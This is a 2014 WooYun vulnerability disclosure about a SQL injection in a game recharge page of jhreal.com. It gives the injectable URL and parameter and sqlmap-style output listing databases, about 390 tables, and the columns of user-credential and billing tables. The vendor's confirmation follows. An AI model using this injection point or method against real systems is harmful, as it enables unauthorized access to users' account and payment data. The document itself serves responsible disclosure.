当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-067352

漏洞标题:浙江印象充值页面sql注入漏洞

相关厂商:jhreal.com

漏洞作者: jaffer

提交时间:2014-07-04 11:42

修复时间:2014-08-18 11:46

公开时间:2014-08-18 11:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-04: 细节已通知厂商并且等待厂商处理中
2014-07-04: 厂商已经确认,细节仅向厂商公开
2014-07-14: 细节向核心白帽子及相关领域专家公开
2014-07-24: 细节向普通白帽子公开
2014-08-03: 细节向实习白帽子公开
2014-08-18: 细节向公众公开

简要描述:

rt

详细说明:

注入点:

http://pay.5see.com/Pay/LyPay?gameid=wycq


数据库:

available databases [3]:
[*] information_schema
[*] test
[*] vxgametv


Database: vxgametv
[390 tables]
+---------------------------------+
| ad_gun_list |
| admin_login_log |
| admin_rollback |
| admindonelog |
| admindonetype |
| agent_bill |
| agent_chongka_ticheng |
| agent_login_log |
| agent_moneylog |
| agent_ticheng_pay_list |
| agent_zhuchi |
| agenttichengtype |
| auth_auser |
| auth_auser_bk |
| auth_group |
| auth_group_permissions |
| auth_message |
| auth_permission |
| auth_session |
| auth_session_log |
| auth_session_log_old |
| auth_session_stat |
| auth_session_stat_0615 |
| auth_session_view |
| auth_session_view_basic |
| auth_user |
| auth_user_groups |
| auth_user_user_permissions |
| b_advice |
| b_re_advice |
| bank_list_05 |
| bankcoin_log_stat |
| bill |
| bill_waika |
| blackmyname |
| card_agent |
| card_agent_getback_bklist |
| cardlogin_log |
| cards |
| cards_changename |
| cards_cread_log |
| cards_event |
| cards_list_100 |
| cards_list_1000 |
| cards_list_500 |
| cards_list_vip |
| cards_product |
| cards_storage |
| cards_storage_log |
| cargame_tj |
| cargame_tj_old |
| carrobot_list |
| category |
| chargesubmit |
| chargesubmit_waika |
| chatavatar |
| coin_control_otherthing |
| coin_jifen_statistics |
| coin_log_stat |
| coin_score_daily |
| coinauth |
| cross_online_stat |
| ddlchangelog |
| django_content_type |
| django_session |
| django_site |
| dynaic_page |
| egg_config |
| egg_config_gift_list |
| egg_degree_level |
| egg_eventscore |
| egg_get_log |
| egg_gift_list |
| egg_hit_log |
| egg_owner |
| error_log |
| event1_chooseteams |
| event1_teamgroups |
| event1_teams |
| event_awardlist |
| event_dance_list |
| event_dance_list_log |
| event_list |
| event_lottery |
| event_survey |
| event_type |
| event_yuanxiao |
| exchange |
| exchange2 |
| exchange_old |
| exchange_old_140408 |
| exchangetime |
| filter |
| flash |
| flashclass |
| flashgame |
| game_gifts |
| game_intro_admin |
| game_intro_list |
| game_intro_pay_list |
| game_intro_task |
| game_intro_uid_log |
| game_intro_uid_temp |
| game_pay_rate_list |
| game_server_list |
| game_stat |
| game_uid_ip_list |
| gamenotices |
| gamenotices_type |
| gj_member |
| gmtv_board |
| gmtv_members |
| gmtv_room_ad |
| gmtv_room_favorites |
| gmtv_room_group |
| gmtv_room_link_group |
| gmtv_room_sign |
| gmtv_server_config |
| gmtv_update |
| gmtv_update2 |
| gmtv_user_stat |
| gmtvbankcoin |
| gmtvbankcoinlog |
| gmtvcoin |
| gmtvcoinlog |
| gmtvcoinlog_05_bk |
| gmtvcoinlog_1304 |
| gmtvdegree |
| gmtvdegreelog |
| gmtvniuniuscore |
| gmtvniuniuscorelog |
| gmtvroomcoin |
| gmtvroomcoinlog |
| gmtvroomscore1303 |
| gmtvroomscore1303log |
| gmtvroomscore1304 |
| gmtvroomscore1304log |
| gmtvroomscore1305 |
| gmtvroomscore1305log |
| gmtvroomscore1306 |
| gmtvroomscore1306log |
| gmtvroomscore1307 |
| gmtvroomscore1307log |
| gmtvroomscore1308 |
| gmtvroomscore1308log |
| gmtvroomscore1309 |
| gmtvroomscore1309log |
| gmtvroomscore1310 |
| gmtvroomscore1310log |
| gmtvroomscore1311 |
| gmtvroomscore1311log |
| gmtvroomscore1312 |
| gmtvroomscore1312log |
| gmtvroomscore1401 |
| gmtvroomscore1401log |
| gmtvroomscore1402 |
| gmtvroomscore1402log |
| gmtvroomscore1403 |
| gmtvroomscore1403log |
| gmtvroomscore1404 |
| gmtvroomscore1404log |
| gmtvroomscore1405 |
| gmtvroomscore1405log |
| gmtvroomscore1406 |
| gmtvroomscore1406log |
| gmtvroomscore1407 |
| gmtvroomscore1407log |
| gmtvroomscore1408 |
| gmtvroomscore1408log |
| gmtvroomscore1409 |
| gmtvroomscore1409log |
| gmtvroomscore1410 |
| gmtvroomscore1410log |
| gmtvroomscore1411 |
| gmtvroomscore1411log |
| gmtvroomscore1412 |
| gmtvroomscore1412log |
| gmtvscore |
| gmtvscorelog |
| help |
| help_class |
| host_award_type |
| host_aword_player |
| host_player_sign_up |
| host_score |
| host_score_item |
| host_vote |
| ht_page_login_list |
| ht_pay_list |
| ht_tui_statistic_list |
| ip_merge |
| ktv_board |
| ktv_members |
| ktv_room_ad |
| ktv_room_favorites |
| ktv_room_group |
| ktv_room_link_group |
| ktv_room_sign |
| ktv_room_type |
| ktv_room_type_relevance |
| ktv_server_config |
| ktv_update |
| ktv_update2 |
| ktv_user_stat |
| ktvrooms |
| link |
| liveroom |
| lockinfo |
| ly_enabled_ip |
| ly_game_cards |
| ly_game_playlog |
| ly_game_servers |
| ly_games |
| member |
| member_131218 |
| member_blockip |
| member_blockipsegment |
| member_cert |
| member_changescore_log |
| member_coin_score_sum_month |
| member_consumepoint |
| member_daheng_details |
| member_daixin_zhuchi |
| member_device |
| member_device_more |
| member_index_tj |
| member_intro_0709 |
| member_intro_ly_0621 |
| member_introducer |
| member_introducer_log |
| member_introducer_login_log |
| member_introducer_placeid_ratio |
| member_introducer_temp_t0 |
| member_level_type |
| member_login_room |
| member_masterscore_bk |
| member_money_day_list |
| member_not_display |
| member_null_cnt |
| member_own |
| member_phoneqqsina |
| member_qq |
| member_registerip |
| member_robot |
| member_scorelog |
| member_site_level |
| member_statistics |
| member_statistics_zhuchi |
| member_test |
| member_than1700 |
| member_tui_admin |
| member_tuistatistics |
| member_tuistatistics2 |
| member_tuistatistics_not_ratio |
| member_tuistatisticste |
| member_tuistatisticste2 |
| member_updengji_stat |
| member_usedcard_record |
| member_usedcard_record_month |
| member_useddate |
| member_zhuchi |
| member_zhuchi_details |
| membercheackip |
| menu1 |
| menuright1 |
| mm_admin |
| mm_album |
| mm_album_good |
| mm_albumcomment |
| mm_albumreply |
| mm_auser_list |
| mm_category |
| mm_follow |
| mm_guestbook |
| mm_guestbookreply |
| mm_info |
| mm_mood |
| mm_moodcomment |
| mm_moodcomment_reply |
| mm_photo |
| mm_show_album |
| mm_show_banner |
| mm_show_user |
| mm_uservisited |
| multiroom |
| multiroom1 |
| multiroom_renqi |
| multiroom_statistics_new |
| ngame_authoperates |
| ngame_games |
| ngame_gameservers |
| ngame_gametypes |
| ngame_introinfo |
| ngame_introtuiguang |
| ngame_introtuigurl |
| ngame_introtype |
| ngame_introusers |
| ngame_managers |
| ngame_menugroups |
| ngame_menus |
| ngame_normalusers |
| ngame_rolepowers |
| ngame_roles |
| ngame_ticdetail |
| ngame_ticscheme |
| notice |
| notice_type |
| number_segment |
| pay_cards |
| pay_cards_log |
| pay_cards_stat |
| pay_cards_type |
| pay_channel |
| pay_channel_use |
| pay_coin |
| pay_list |
| pay_list_1401 |
| pay_list_xs |
| pay_monthly |
| pay_monthly_log |
| pay_type |
| phone_advs |
| plat_event_list |
| plat_event_nangua |
| plat_events |
| platform |
| qianmoneylog |
| real_exchange |
| real_returnchangecode |
| real_returncode |
| remotelog_application |
| remotelog_logmessage |
| rooms_popularity_day |
| rpt_cards_daily |
| rvdb_member |
| saleusers |
| score_log_stat |
| seee_room_group |
| seee_room_link_group |
| seee_server_config |
| servers |
| shengzhouxing_bill |
| siting_config |
| sqlmapoutput |
| st_applist |
| st_apptypes |
| st_default_event |
| st_platforms |
| st_user_event |
| statistic_platform |
| sys_monitorchangelog |
| sysdiagrams |
| syslog |
| system_admin |
| system_adminpermissions |
| system_creaduser_log |
| system_menufather |
| system_permissions |
| tableidcontrol |
| tableidcontrol_game |
| tb_pro_city |
| tb_sales_detail |
| tehao |
| tehao_new |
| tehao_vip_yin |
| temp_lydd |
| temp_psdid |
| tenroom_userinfo |
| tg_qq_url_list |
| tip_client |
| tmp2 |
| tmp_active_zc |
| tmp_active_zc2 |
| tmp_coinless100 |
| tmp_coinless100_group |
| tmp_shell |
| tmp_shell2 |
| trade_recover_log |
| tui_zhuang_log |
| tuigliveroom |
| u766_room_group |
| u766_room_link_group |
| u766_server_config |
| user_block_reason |
| user_frver_list |
| user_machine |
| user_machine_block |
| v_introusers |
| zhuchi_score_month |
| zhuchi_shelldaystatistic |
+---------------------------------+


某几张表:

Database: vxgametv
Table: member_qq
[5 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| createtime | timestamp |
| pwd | varchar(64) |
| qqopenid | varchar(32) |
| src_type | varchar(20) |
| useridx | bigint(22) |
+------------+-------------+


Database: vxgametv
Table: bill
[13 columns]
+----------+---------------+
| Column | Type |
+----------+---------------+
| Amount | decimal(18,2) |
| b_id | int(11) |
| billno | varchar(50) |
| cardtype | varchar(10) |
| coin | bigint(20) |
| date | char(14) |
| kbillno | varchar(30) |
| masterid | varchar(20) |
| Memo | varchar(255) |
| paydate | datetime |
| PayWay | varchar(20) |
| succ | varchar(1) |
| UserID | varchar(20) |
+----------+---------------+

漏洞证明:

只是做了一下测试。

14.jpg


111.jpg


信息太多了,你们赶快修复吧。不然问题可就大了。

修复方案:

版权声明:转载请注明来源 jaffer@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-07-04 12:13

厂商回复:

已经提交相关人员修改,对注入一直没有重视

最新状态:

暂无